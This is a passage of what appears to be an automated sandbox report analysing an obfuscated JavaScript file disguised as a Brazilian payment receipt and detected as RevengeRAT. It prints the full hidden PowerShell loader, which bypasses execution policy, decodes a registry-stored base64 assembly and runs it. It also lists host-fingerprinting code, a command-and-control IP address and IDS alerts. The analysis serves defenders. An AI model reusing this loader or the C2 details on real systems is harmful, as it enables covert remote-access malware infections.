            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4620Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5263Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep time: -11990383647911201s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: powershell.exe, 00000001.00000002.2980065256.00000176F61C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Bypasses PowerShell execution policy
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noexit -executionpolicy bypass -windowstyle hidden -command "$_b = (get-itemproperty -path 'hkcu:\software\microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [system.convert]::frombase64string($_b);$_1 = [system.threading.thread]::getdomain().load($_0);$_1.entrypoint.invoke($null,$null);"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noexit -executionpolicy bypass -windowstyle hidden -command "$_b = (get-itemproperty -path 'hkcu:\software\microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [system.convert]::frombase64string($_b);$_1 = [system.threading.thread]::getdomain().load($_0);$_1.entrypoint.invoke($null,$null);"Jump to behavior
            Source: powershell.exe, 00000001.00000002.2959069281.000001768056A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2959069281.0000017680564000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2959069281.0000017681EA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: powershell.exe, 00000001.00000002.2980065256.00000176F61C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980065256.00000176F6222000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

            barindex
            Yara detected RevengeRAT
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR
            Found RAT behaviour (information extraction to be send to C&C)
            Source: 1.2.powershell.exe.17680368c20.0.raw.unpack, IdGenerator.cs.Net Code: Dns.GetHostByName(Dns.GetHostName()) new ManagementObjectSearcher("select * from Win32_Processor").Get().GetEnumerator() Registry.GetValue("HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\SYSTEM\\CENTRALPROCESSOR\\0", "ProcessorNameString", null)
            Source: 1.2.powershell.exe.176f6380000.2.raw.unpack, IdGenerator.cs.Net Code: Dns.GetHostByName(Dns.GetHostName()) new ManagementObjectSearcher("select * from Win32_Processor").Get().GetEnumerator() Registry.GetValue("HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\SYSTEM\\CENTRALPROCESSOR\\0", "ProcessorNameString", null)
            Source: 1.2.powershell.exe.1768164d990.1.raw.unpack, IdGenerator.cs.Net Code: Dns.GetHostByName(Dns.GetHostName()) new ManagementObjectSearcher("select * from Win32_Processor").Get().GetEnumerator() Registry.GetValue("HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\SYSTEM\\CENTRALPROCESSOR\\0", "ProcessorNameString", null)

            Remote Access Functionality

            barindex
            Yara detected RevengeRAT
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information22
            Scripting            		Valid Accounts21
            Windows Management Instrumentation            		22
            Scripting            		12
            Process Injection            		1
            Masquerading            		OS Credential Dumping31
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		LSASS Memory2
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution            		Logon Script (Windows)Logon Script (Windows)12
            Process Injection            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Remote Access Software            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts3
            PowerShell            		Login HookLogin Hook2
            Obfuscated Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            comprovante de pagamento.js5%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            No contacted domains info

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2974720720.000001769008B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://aka.ms/pscore68powershell.exe, 00000001.00000002.2959069281.0000017680001000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2959069281.0000017680001000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://go.micropowershell.exe, 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2974720720.000001769008B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 00000001.00000002.2974720720.00000176901C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  38.51.135.44
                                  		unknownUnited States
                                  		174COGENT-174UStrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1578395
                                  Start date and time:2024-12-19 16:41:07 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 31s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:7
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:comprovante de pagamento.js
                                  Detection:MAL
                                  Classification:mal100.troj.expl.evad.winJS@4/3@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 86%
                                  • Number of executed functions: 13
                                  • Number of non-executed functions: 5
                                  Cookbook Comments:
                                  • Found application associated with file extension: .js

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: comprovante de pagamento.js

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  10:42:02API Interceptor3591158x Sleep call for process: powershell.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  COGENT-174USarm7.nn-20241219-1505.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 206.1.243.67
                                  arm5.nn-20241219-1505.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 38.198.210.196
                                  x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 149.51.56.62
                                  powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 149.122.211.39
                                  sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 167.141.20.244
                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 38.216.49.233
                                  x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 206.250.148.68
                                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 38.57.123.8
                                  sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 167.141.205.77
                                  powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 38.165.175.31

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):11887
                                  Entropy (8bit):4.901437212034066
                                  Encrypted:false
                                  SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                                  MD5:ED30A738A05A68D6AB27771BD846A7AA
                                  SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                                  SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                                  SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1rgfjrx.rvg.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nllkxrvf.vkw.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  Static File Info

                                  General

                                  File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                  Entropy (8bit):3.456824357283798
                                  TrID:
                                  • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                  • MP3 audio (1001/1) 32.22%
                                  • Lumena CEL bitmap (63/63) 2.03%
                                  • Corel Photo Paint (41/41) 1.32%
                                  File name:comprovante de pagamento.js
                                  File size:119'582 bytes
                                  MD5:0c3e47c0fb0d5a289fded25fd9746817
                                  SHA1:2117b82b1724a2f146ffd015b50ce45c63d7fb87
                                  SHA256:2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d
                                  SHA512:bf8b2895fa9cf32c651d67ff68c3156dfd2f32e4fc9308ec5a190eaf942816feae1357086b150442c4359619356cf6cf3bd4e9bcf8d866b52c51b0c3978133ad
                                  SSDEEP:1536:D12+GPp0PG/6Rn/T5d1XtQpm7GOzYCtFA:p2+GB0PG/sn/T5dt+IdG
                                  TLSH:C5C380AC7CE7A03E6255C995A7D0516BF429639F520E3B9618C3C3D9472360BE4A8F3C
                                  File Content Preview:..v.a.r. ._.0.x.5.8.5.0.0.2.=._.0.x.1.6.7.5.;.(.f.u.n.c.t.i.o.n.(._.0.x.5.5.3.5.d.8.,._.0.x.1.f.8.3.0.0.).{.v.a.r. ._.0.x.1.0.9.0.7.e.=._.0.x.1.6.7.5.,._.0.x.1.5.f.f.9.6.=._.0.x.5.5.3.5.d.8.(.).;.w.h.i.l.e.(.!.!.[.].).{.t.r.y.{.v.a.r. ._.0.x.4.4.0.9.9.8.=

                                  File Icon

                                  Icon Hash:68d69b8bb6aa9a86

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-12-19T16:42:07.244342+01002841113ETPRO MALWARE MSIL/Revenge-RAT CnC Checkin M41192.168.2.44973038.51.135.44333TCP
                                  2024-12-19T16:42:37.253666+01002035885ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M21192.168.2.44973038.51.135.44333TCP
                                  2024-12-19T16:43:07.252902+01002035885ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M21192.168.2.44973038.51.135.44333TCP
                                  2024-12-19T16:43:37.257973+01002035885ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M21192.168.2.44973038.51.135.44333TCP
                                  2024-12-19T16:43:51.502758+01002035885ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M21192.168.2.44973038.51.135.44333TCP
                                  2024-12-19T16:43:55.674603+01002035885ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M21192.168.2.44973038.51.135.44333TCP
                                  2024-12-19T16:43:55.862048+01002035885ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M21192.168.2.44973038.51.135.44333TCP
                                  2024-12-19T16:44:11.610122+01002035885ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M21192.168.2.44973038.51.135.44333TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 19, 2024 16:42:06.584393024 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:42:06.704333067 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:06.704468966 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:42:07.244342089 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:42:07.365320921 CET3334973038.51.135.44192.168.2.4
